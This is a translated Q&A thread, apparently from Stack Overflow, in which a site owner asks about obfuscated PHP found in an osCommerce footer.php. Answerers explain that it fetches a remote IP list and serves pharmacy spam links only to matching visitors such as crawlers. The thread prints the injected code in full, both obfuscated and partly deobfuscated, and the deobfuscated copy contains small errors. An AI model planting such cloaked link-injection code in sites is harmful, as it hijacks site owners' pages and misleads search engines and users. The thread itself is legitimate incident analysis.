5

誰か/何かによって悪用されたサイトを見ています。このサイトのフッターには、医薬品の売り込みへのリンクが多数挿入されており、他に何があるかは誰にもわかりません。フッターの上部にたくさんのリンクがあります。これらは現在、Yahoo インデックスのキャッシュされたページでしか見つけることができません。ただし、Google はまだサイトに満足しておらず、ライブ サイトにはリンクが表示されなくなりました。これはクライアントのためのものです..ですから、私が言われたことと、他に賢明なことを見つけることができることをほとんど知っています.

このコードは、footer.php (OsCommerse サイト) のまさに「ヒント/トップ」にありました。

<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m"; 
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>

「悪い」リンクを含むソース キャッシュ ページを表示すると、このコードは、footer.php ソースで見つけた場所にぴったりとはまります。Google で少し調査したところ、同様のコードを使用したエクスプロイトが存在することがわかりました。

自分のサーバーで実行すると、ソースにエコーされたコメントが次のように表示されるだけです。

<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->

特に「悪いリンク」がなくなったことをすぐに知る方法がないため、見た目が悪いという理由だけでコードを急いで削除して「あなたの良い」と言いたくありません。ところで、リンクはすべて無効な URL に移動します。

Yahoo でまだキャッシュされている不良ページを確認できます: http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u =http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl =us&sig=Ifqk1OuvHXNcZnGgPR9PbA--

4

3 に答える 3

3

2つのURLを参照/ロードしているようです。

これは単なるスパム配信スクリプトです。


部分的な難読化解除の使用:

print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);
于 2011-05-31T19:04:16.273 に答える
2

これは、実行中の構成に関する情報をダンプしようとする試みです。すぐに取り外してください。

その仕組みは非常に複雑で、私にはわかりませんが、サイトをハッキングするための最初のステップの 1 つです。

于 2011-05-31T19:00:20.660 に答える
2

これが難読化されていないスクリプトです(多かれ少なかれ)

この URLのコンテンツをページにダンプするだけです。

また、remote_addrを IP のリスト(google など) と照合して、検出されないようにします。

genshop.com に攻撃されているようです

<?php

 $count="cou\156\x74"; // count 
 $error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
 $file="\146\151l\x65"; // file
 $file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
 $strlen="\163\x74rle\156"; // strlen
 $strpos="\163tr\160o\x73"; // strpos
 $substr="su\x62\x73\164\162"; // substr
 $trim="tr\151m"; //trim

ini_set(' display_errors','off');
$error_reporting(0);

$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";

$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
    $curr_ip = $trim($ips[$i]);
        if ( $curr_ip != "" ) {
            if ( ($x11 = $strpos($curr_ip, "*")) !== false )
                $curr_ip = $substr($curr_ip, 0,$x11);

            // check visitor ip against mask list
            if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
                $x12 = $file_get_content($tmp_filename);
                echo "$x12";
                // print spam contents
            }
        }
    }
echo $curr_ip;
}

$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>
于 2011-05-31T19:28:45.383 に答える